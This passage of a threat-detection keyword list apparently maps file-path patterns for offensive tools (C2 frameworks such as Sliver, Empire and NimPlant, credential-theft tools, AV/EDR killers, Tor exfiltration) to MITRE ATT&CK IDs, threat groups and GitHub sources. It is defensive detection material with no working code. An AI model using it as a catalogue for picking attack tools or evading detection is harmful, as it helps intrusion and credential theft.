Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*/NetExec.git*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,1,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -*/NetExec-main*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,1,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -*/Net-GPPPassword.git*,offensive_tool_keyword,Net-GPPPassword,.NET implementation of Get-GPPPassword. Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.,T1059.001 - T1552.007,TA0002 - TA0006,N/A,N/A,Credential Access,https://github.com/outflanknl/Net-GPPPassword,1,1,N/A,10,2,156,37,2019-12-18T10:14:32Z,2019-10-14T12:35:46Z -*/nethunter-images/*,offensive_tool_keyword,kali,Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. 
Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/NetLoader.git*,offensive_tool_keyword,NetLoader,Loads any C# binary in memory - patching AMSI + ETW,T1055.012 - T1112 - T1562.001,TA0005 - TA0002,N/A,N/A,Exploitation tools - Defense Evasion,https://github.com/Flangvik/NetLoader,1,1,N/A,10,7,684,139,2021-10-03T16:41:03Z,2020-05-05T15:20:16Z -*/netntlm.pl*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*/NetNTLMtoSilverTicket*,offensive_tool_keyword,NetNTLMtoSilverTicket,Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.,T1110.001 - T1558.003 - T1558.004,TA0006 - TA0008 - TA0002,N/A,N/A,Credential Access,https://github.com/NotMedic/NetNTLMtoSilverTicket,1,1,N/A,10,7,635,105,2021-07-26T15:16:20Z,2019-01-14T15:32:27Z -*/netscan.exe*,greyware_tool_keyword,netscan,SoftPerfect Network Scanner abused by threat actor,T1040 - T1046 - T1018,TA0007 - TA0010 - TA0001,N/A,N/A,Network Exploitation tools,https://www.softperfect.com/products/networkscanner/,1,1,N/A,6,10,N/A,N/A,N/A,N/A -*/netscan.exe*,greyware_tool_keyword,softperfect networkscanner,SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell,T1046 - T1065 - T1135 ,TA0007 ,N/A,N/A,Discovery,https://www.softperfect.com/products/networkscanner/,1,1,N/A,8,10,N/A,N/A,N/A,N/A -*/netscan_linux.tar.gz*,greyware_tool_keyword,softperfect networkscanner,SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about 
network devices via WMI SNMP HTTP SSH and PowerShell,T1046 - T1065 - T1135 ,TA0007 ,N/A,N/A,Discovery,https://www.softperfect.com/products/networkscanner/,1,1,N/A,8,10,N/A,N/A,N/A,N/A -*/netscan_portable.zip*,greyware_tool_keyword,softperfect networkscanner,SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell,T1046 - T1065 - T1135 ,TA0007 ,N/A,N/A,Discovery,https://www.softperfect.com/products/networkscanner/,1,1,N/A,8,10,N/A,N/A,N/A,N/A -*/netscan_setup.exe*,greyware_tool_keyword,softperfect networkscanner,SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell,T1046 - T1065 - T1135 ,TA0007 ,N/A,N/A,Discovery,https://www.softperfect.com/products/networkscanner/,1,1,N/A,8,10,N/A,N/A,N/A,N/A -*/netshrun.c*,greyware_tool_keyword,NetshRun,Netsh.exe relies on extensions taken from Registry which means it may be used as a persistence and you go one step further extending netsh with a DLL allowing you to do whatever you want,T1546.008 - T1112 - T1037 - T1055 - T1218.001,TA0003 - TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/gtworek/PSBits/blob/master/NetShRun,1,1,N/A,N/A,10,2669,471,2023-09-28T06:10:58Z,2019-06-29T13:22:36Z -*/netsparker.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/netstat_windows.go*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*/nettitude/*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*/nettitude/RunOF/*,offensive_tool_keyword,cobaltstrike,A tool to run object files mainly beacon object files (BOF) in .Net.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - 
T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nettitude/RunOF,1,1,N/A,10,10,129,22,2023-01-06T15:30:05Z,2022-02-21T13:53:39Z -*/NetUser.cpp*,offensive_tool_keyword,cobaltstrike,Use windows api to add users which can be used when net is unavailable,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/lengjibo/NetUser,1,1,N/A,10,10,410,90,2021-09-29T14:22:09Z,2020-01-09T08:33:27Z 
-*/NetUser.exe*,offensive_tool_keyword,cobaltstrike,Use windows api to add users which can be used when net is unavailable,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/lengjibo/NetUser,1,1,N/A,10,10,410,90,2021-09-29T14:22:09Z,2020-01-09T08:33:27Z -*/netuserenum/*,offensive_tool_keyword,cobaltstrike,Situational Awareness commands implemented using Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - 
TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Situational-Awareness-BOF,1,1,N/A,10,10,964,172,2023-09-22T15:51:55Z,2020-07-15T16:21:18Z -*/network/bloodhound3*,offensive_tool_keyword,empire,Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*/Network/PortScan/*,offensive_tool_keyword,cobaltstrike,Various Cobalt Strike BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rvrsh3ll/BOF_Collection,1,1,N/A,10,10,480,49,2022-10-16T13:57:18Z,2020-07-16T18:24:55Z -*/NewPhish.ps1*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*/Newtonsoft.Json.dll*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,1,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*/nexpose-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/nfs-ls.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/nfs-showmount.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/nfs-statfs.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/nginxed-root.sh*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*/nidem/kerberoast*,offensive_tool_keyword,kerberoast,Kerberoast is a series of tools for attacking MS Kerberos implementations,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Credential Access,https://github.com/nidem/kerberoast,1,1,N/A,N/A,10,1282,313,2022-12-31T17:17:28Z,2014-09-22T14:46:49Z -*/Nightmangle.git*,offensive_tool_keyword,Nightmangle,ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/1N73LL1G3NC3x/Nightmangle,1,1,N/A,10,10,72,10,2023-09-26T19:21:31Z,2023-09-26T18:25:23Z -*/nikto.git*,offensive_tool_keyword,nikto,Nikto web server scanner,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/sullo/nikto,1,1,N/A,N/A,10,7136,1096,2023-09-18T14:44:28Z,2012-11-24T04:24:29Z -*/nikto.pl*,offensive_tool_keyword,nikto,Nikto web scanner tool,T1210.001 - T1190 - T1046 - T1222,TA0007 - TA0002 - TA0001,N/A,N/A,Web 
Attacks,https://github.com/sullo/nikto,1,1,N/A,N/A,10,7136,1096,2023-09-18T14:44:28Z,2012-11-24T04:24:29Z
-*/nikto.pl*,offensive_tool_keyword,nikto,Nikto web server scanner,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/sullo/nikto,1,1,N/A,N/A,10,7136,1096,2023-09-18T14:44:28Z,2012-11-24T04:24:29Z
-*/NimBlackout*,offensive_tool_keyword,NimBlackout,Kill AV/EDR leveraging BYOVD attack,T1562.001 - T1055.001 - T1055.012,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/Helixo32/NimBlackout,1,1,N/A,N/A,3,232,33,2023-07-11T07:32:50Z,2023-07-06T18:40:02Z
-*/NimBlackout*,offensive_tool_keyword,NimBlackout,Kill AV/EDR leveraging BYOVD attack,T1562.001 - T1055.001 - T1055.012,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/Helixo32/NimBlackout,1,0,N/A,N/A,3,232,33,2023-07-11T07:32:50Z,2023-07-06T18:40:02Z
-*/NimBlackout*,offensive_tool_keyword,NimBlackout,Kill AV/EDR leveraging BYOVD attack,T1562.001 - T1055.001 - T1055.012,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/Helixo32/NimBlackout,1,1,N/A,N/A,3,232,33,2023-07-11T07:32:50Z,2023-07-06T18:40:02Z
-*/NimBlackout*,offensive_tool_keyword,NimBlackout,Kill AV/EDR leveraging BYOVD attack,T1562.001 - T1055.001 - T1055.012,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/Helixo32/NimBlackout,1,0,N/A,N/A,3,232,33,2023-07-11T07:32:50Z,2023-07-06T18:40:02Z
-*/NimBlackout*,offensive_tool_keyword,NimBlackout,Kill AV/EDR leveraging BYOVD attack,T1562.001 - T1055.001 - T1055.012,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/Helixo32/NimBlackout,1,1,N/A,N/A,3,232,33,2023-07-11T07:32:50Z,2023-07-06T18:40:02Z
-*/nimcrypt.nim*,offensive_tool_keyword,nimcrypt,Nimcrypt is a .NET PE Crypter written in Nim based entirely on the work of @byt3bl33d3r's OffensiveNim project,T1027 - T1055 - T1099 - T1140,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/icyguider/nimcrypt,1,1,N/A,N/A,1,83,5,2021-03-25T00:27:12Z,2021-03-24T17:51:52Z
-*/nimcrypt/*,offensive_tool_keyword,nimcrypt,Nimcrypt is a .NET PE Crypter written in Nim based entirely on the work of @byt3bl33d3r's OffensiveNim project,T1027 - T1055 - T1099 - T1140,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/icyguider/nimcrypt,1,1,N/A,N/A,1,83,5,2021-03-25T00:27:12Z,2021-03-24T17:51:52Z
-*/Nimcrypt2*,offensive_tool_keyword,Nimcrypt2,.NET PE & Raw Shellcode Packer/Loader Written in Nim,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/icyguider/Nimcrypt2,1,1,N/A,N/A,7,651,113,2023-01-20T22:07:15Z,2022-02-23T15:43:16Z
-*/NimExec.git*,offensive_tool_keyword,NimExec,Fileless Command Execution for Lateral Movement in Nim,T1021.006 - T1059.005 - T1564.001,TA0008 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/frkngksl/NimExec,1,1,N/A,N/A,4,307,33,2023-06-23T11:07:20Z,2023-04-21T19:46:53Z
-*/NimPlant.*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z
-*/NimPlant/*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z
-*/nimplants/*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z
-*/ninja.crt*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z
-*/Ninja.git*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z
-*/ninja.key*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z
-*/Ninja.py*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z
-*/nipe.git,offensive_tool_keyword,nipe,An engine to make Tor Network your default gateway.,T1560 - T1573 - T1578,TA0005 - TA0007,N/A,N/A,Data Exfiltration,https://github.com/htrgouvea/nipe,1,0,N/A,N/A,10,1692,315,2023-09-22T12:35:29Z,2015-09-07T18:47:10Z
-*/nipe.pl,offensive_tool_keyword,nipe,An engine to make Tor Network your default gateway.,T1560 - T1573 - T1578,TA0005 - TA0007,N/A,N/A,Data Exfiltration,https://github.com/htrgouvea/nipe,1,1,N/A,N/A,10,1692,315,2023-09-22T12:35:29Z,2015-09-07T18:47:10Z
-*/nishang*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security. penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.,T1059.001 - T1027 - T1210.001 - T1055.012 - T1047,TA0002 - TA0003 - TA0004 - TA0005,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*/nishang/*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*/nje-node-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/nje-pass-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/nmap.py*,offensive_tool_keyword,crackmapexec,parser nmap.py from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
